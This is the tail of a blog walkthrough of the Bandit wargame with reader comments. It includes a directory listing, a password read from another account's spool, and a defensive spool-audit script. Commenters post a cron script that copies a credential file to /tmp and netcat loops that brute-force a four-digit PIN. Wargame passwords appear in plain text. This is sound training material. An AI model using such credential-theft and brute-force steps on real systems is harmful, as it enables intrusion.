    -rw-r--r-- 1 root root 35 2011-11-13 23:08 semtex5
    -rw-r--r-- 1 root root 29 2011-11-13 23:08 semtex6
    -rw-r--r-- 1 root root 96 2011-11-25 14:00 semtex8
    -rw-r--r-- 1 root root 134 2011-11-13 23:14 semtex9
    -rw-r--r-- 1 root root 29 2011-11-13 23:07 vortex0
    -rw-r--r-- 1 root root 30 2012-03-24 21:00 vortex20
    -rw-r--r-- 1 root root 52 2012-12-23 00:06 vulnbot0-check
    -rw-r--r-- 1 root root 52 2012-12-23 00:06 vulnbot1-check
    total 93
    drwx-wx--- 13 bandit24 bandit23 1024 2013-03-21 02:44 .
    drwxr-xr-x 6 root root 4096 2012-07-05 09:24 ..
    -rw-r--r-- 1 bandit23 bandit23 130 2012-10-30 20:50 .aaa.sh
    drwxr-xr-x 2 bandit23 bandit23 1024 2013-01-21 03:15 asdsd
    -rw------- 1 bandit23 bandit23 12288 2012-06-05 15:22 .a.sh.swo
    drwxr-xr-x 2 bandit23 bandit23 1024 2013-02-25 11:35 bandit23
    drwxrwxrwx 2 bandit23 bandit23 1024 2013-03-11 20:15 bandit24
    -rw------- 1 bandit23 bandit23 12288 2012-10-14 17:23 .catpass.sh.swp
    -rwxr-xr-x 1 bandit23 bandit23 42 2013-03-21 02:44 dump.sh
    drwxr-xr-x 2 bandit23 bandit23 1024 2012-12-20 18:31 galo
    -rw------- 1 bandit23 bandit23 12288 2012-11-14 04:45 .getpass.swp
    drwxrwxrwx 2 bandit23 bandit23 1024 2013-03-13 22:07 inhere
    drwxr-xr-x 2 bandit23 bandit23 1024 2012-07-06 13:26 lolwut
    drwx------ 2 root root 12288 2012-05-30 14:18 lost+found
    drwxr-xr-x 2 bandit23 bandit23 1024 2013-02-23 21:44 pass
    drwxr-xr-x 2 bandit24 bandit24 1024 2012-12-30 12:44 passjurgen
    -rw-r--r-- 1 bandit24 bandit24 33 2012-10-13 09:33 .plop
    -rw------- 1 bandit23 bandit23 12288 2013-01-23 19:13 .shellcode.swo
    -rw------- 1 bandit23 bandit23 12288 2013-01-23 19:03 .shellcode.swp
    drwxr-xr-x 2 bandit23 bandit23 1024 2012-09-28 14:24 sub
    -rw-r--r-- 1 bandit23 bandit23 3 2012-09-28 14:38 .t1
    -rw-r--r-- 1 bandit23 bandit23 3 2012-09-28 14:38 .t2
    -rw-r--r-- 1 bandit23 bandit23 3 2012-09-28 14:38 .t3
    drwxr-xr-x 2 bandit23 bandit23 1024 2012-11-27 17:46 zdenial
    #Nice, we see some interesting files, let's go to this one:
    bandit23@melissa:/tmp/cccc$ cd /var/spool/bandit24/pass
    bandit23@melissa:/var/spool/bandit24/pass$ ls
    pass
    bandit23@melissa:/var/spool/bandit24/pass$ cat pass
    UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
And there is the password for the last level. Although we can log in to level24, there is nothing more to do. Congratulations, I hope you have learned something from this and found it interesting. Submit a new level for us or move on to the other servers. Leviathan is generally recommended next…
Level 24->25:
This level does not yet exist…
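The Level 23 -> 24 cron job works as an escalation path because it executes every file in a spool directory that another account can write to (drwx-wx--- bandit24 bandit23 in the listing above). As an added example, not part of the original post or the wargame's own script, here is how an administrator could audit such a spool and run only trusted files; audit_spool and run_trusted are hypothetical helper names, and the account may be given as a name or numeric uid.

```shell
#!/bin/sh
# Added example (not the wargame's script). audit_spool and run_trusted are
# hypothetical helpers; arguments are the spool directory and the account
# (name or numeric uid) the cron job runs as.

# Print one finding per line; return 1 if the spool lets another account
# get code executed by the job.
audit_spool() {
    dir=$1; run_user=$2; findings=0
    # Group- or world-writable directory: anyone with that access can drop
    # a script into it.
    if [ -n "$(find "$dir" -maxdepth 0 \( -perm -020 -o -perm -002 \))" ]; then
        echo "DIR_WRITABLE_BY_OTHERS $dir"
        findings=1
    fi
    # Entries owned by someone other than the job's account.
    foreign=$(find "$dir" -mindepth 1 -maxdepth 1 ! -user "$run_user")
    if [ -n "$foreign" ]; then
        printf '%s\n' "$foreign" | sed 's/^/FOREIGN_OWNER /'
        findings=1
    fi
    return "$findings"
}

# Hardened replacement for the "for i in *; ./$i" loop: run only regular,
# owner-executable files that belong to the job's account and that neither
# group nor others can modify.
run_trusted() {
    dir=$1; run_user=$2
    find "$dir" -mindepth 1 -maxdepth 1 -type f -user "$run_user" \
        ! -perm -020 ! -perm -002 -perm -100 \
        -exec sh -c '"$1"' sh {} \;
}
```

Run against the spool shown in the listing, audit_spool would report the directory itself and every bandit23-owned entry, and run_trusted would skip dump.sh because it is not owned by bandit24.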
Reblogged this on Jareds blog and commented:
Awesome walkthrough
thanks!
Hey! Pretty impressive walkthrough, but why not use nmap’s -sV option to identify the service of the port and you would get 31790!
Excellent point, I’m actually in the challenge right now figuring out why I would have done that. I think I know why. When scanning the same port range, with the -sV option, I get this: 31790/tcp open msdtc Microsoft Distributed Transaction Coordinator (error). On two different ports (31518 and 31790). This probably didn’t strike me as having SSL on it, or may have even been different at one point. Either way, you need to manually connect to see that port 31790 is the right one. Cheers.
Thnx.
I was confused about some tasks and your blog helped me a lot!
Well, I guess they changed something in level 23 > 24
My dump.sh looks like this:
bandit23@melinda:/tmp/ccccc$ cat dump.sh
#!/bin/bash
ls -la >> /tmp/ccccc/list.txt
The list.txt file looks like this:
bandit23@melinda:/tmp/ccccc$ cat list.txt
total 6
drwxrwxrwx 2 bandit24 bandit23 1024 Feb 25 22:56 .
drwxr-xr-x 6 root root 4096 Jun 6 2013 ..
-rwxrwxr-x 1 bandit23 bandit23 44 Feb 25 22:56 dump.sh
Same here!
I suspected so, and I changed my script accordingly.
Instead of looking for the gold in the directory, I get the cron job to copy the password out to my temp folder.
#!/bin/sh
Pass=$(cat /etc/bandit_pass/bandit24)
echo $Pass >> /tmp//password.txt
As per rundata’s guide, you will have to ensure that your file is 777 in permission as well as the folder /tmp/
Have fun 😉
Regards,
JS.
Sorry, it filtered out my angle brackets. Your directory should be /tmp/your_self_created_directory/
This applies to the bash script and the 777 permission portion. (not /tmp/)
great walk through, thanks!
the chmod -R 777 /tmp/ is the reason I spent an hour for nothing 😦
Thanks for the guide!
hi. your stuff is interesting 🙂 it helped me a lot
except that for the last one it was kinda…complicated? I found a very easy solution:
cd /etc/cron.d
ls
cat cronjob_bandit24
cat /usr/bin/cronjob_bandit24.sh
cd /var/spool/bandit24
ls
cd /var/spool/bandit24/tmp
ls
cat bandit24pass (or cat bandit24 which works too)
et voilaa
newb ?
After finding the psswd for bandit1.
Am I supposed to start a new login session with username bandit1 and the passwd from the readme file?
Which I’m pretty sure is what I’m supposed to do.
I just keep getting access denied.
Also my putty session gets kicked by the server.
disregard my post
user error copy n paste fixed that for me.
In level 0 I do the command: cat /README.txt and it just prompts text in the terminal, and no password -.- can u help me?
Try reading.
Good job on posting this bro! I’m a little late but I just realized that Level 24 > Level 25 now exist so I’m happy to paste my way of solving it here…
Level 24 > Level 25 My Solution:
#Create a folder called bf25 on /tmp to work on it and switch to that folder
mkdir /tmp/bf25/
cd /tmp/bf25/
#create a file with the password, repeat that 10000 times
printf 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ\n%.0s' {1..10000} >> pass.txt
#Create a file with all possible pins
seq -w 0 1 9999 > pin.txt
#Join the two files with "paste"
paste -d ' ' pass.txt pin.txt > brute_force.txt
#Feed the file to netcat and send the data to the port, exclude wrong answers with 'grep'
nc localhost 30002 < brute_force.txt | grep -v "Wrong"
#Congrats! You got the password!
Hey,
posting solutions to an ongoing and maintained wargame really sucks. These games should be educational and challenging for every body. Please keep your solutions (AND ESPECIALLY THE FUCKING PASSWORDS) private. Thank you very much.
Cheers,
morla
I’ve recently considered this. And have over the years pondered the educational merit of not allowing solutions to be viewed. Sure, tough love has more honor in it, but it doesn’t necessarily help anyone understand anything better. In the beginning, a hacker doesn’t have the tool set to attack problems that may take several weeks or months to solve.
If they spent that much time melting their minds on a challenge site solution, they would be hindering their learning curve. They want information, a ton of it, and fast. They absorb. There will always be the type out there who consistently look for the easy way. But who are they really hurting? Don’t get it twisted. It is your duty to share knowledge.
Hey,
I like what you said. I was thinking about it in the beginning when I read on their website not to use guides and just try and do it yourself. Practice is important but I also think that guides like this one feed people’s desire for knowledge and they make you understand quickly what and why is something exploitable. Like you said, you only hurt yourself if walk through guides are the only thing you use to learn.
It will forever be an argument with wargame sites. On one hand it’s great to have worked through a problem and found a solution. On the other, after you have tried and tried on a solution, you may just have syntax on one character wrong, which if discovered, would be remembered, therefore you are still learning. Be resourceful.
Hey! I’ve been using this post as a fallback whenever I get stuck for hours on a particular level. I just ran into an issue with 16>17. I paste the key into the file when vim gets opened, and I save it. When I establish a connection as bandit17 with -i sshkey.private , it asks me for a sshkey passphrase. Am I doing something wrong?
Hello, please do not be too harsh, I am new to this and want to understand why you use some of the commands you do. On level 8, how do you know to use -u?
You gotta read the man page on it, then google for example usage.
For level 24 > 25
for i in `seq -w 0000 9999` ; do echo "$(cat /etc/bandit_pass/bandit24) $i" | nc localhost 30002 >> /tmp/list.txt ; done
You do know you don’t need to pipe `cat` to `grep`? You can simply do `grep millionth data.txt`?
We do now. Good eye.
How can I change my last comment to checkmark notify of new comments?
You’ll get a notification when I’ve approved your comment.
Why are none of my comments showing up -.-.
Who dat saying their comments don’t turn up?
I am on bandit0->1. I have got the password and no matter if I ctrl+v the password or type the password for ssh to bandit1 it fails…Access denied.
Are you sure you got the password? They have probably changed the password or the level was under maintenance.
I also have a similar problem, in bandit1->bandit2 I try to “cat ./-” but it says permission denied. Where do I have to put the password? I’m confused
The same happens with me, I can’t log in to anything other than bandit0
Cameron, thanks a lot for putting the solutions out there! It is greatly appreciated.
You are very welcome Peter.
Yeah, I don’t get why you posted passwords for each level. You beat the game and have also mastered being a douchebag.
If you would rather just input the given password then you are only cheating yourself.
I have obtained the password in level 1 (the readme file). But I can’t log in to the new level? Can someone help me? The command I’m using is bandit1@bandit.labs.overthewire.org -p 2220, but it doesn’t work
can’t do 23 > 24 now
bandit23@bandit:/tmp/pppp$ cd /var/spool/bandit24/pass
-bash: cd: /var/spool/bandit24/pass: No such file or directory
doesn’t exist, must have changed something here
help pls
Yes, often they will change the solution a little. But it’s not far off…
Level 5-> 6:
You used the -size option to specify the size of the file but there is no -size option in the file manual. Where can I find it? THX
It’s a flag common to some bash commands, like find for example. Search the man pages: https://linux.die.net/man/1/find
Need more info. Wrong port, pass, or username? Expired session, etc. Did they change the password? This happens sometimes.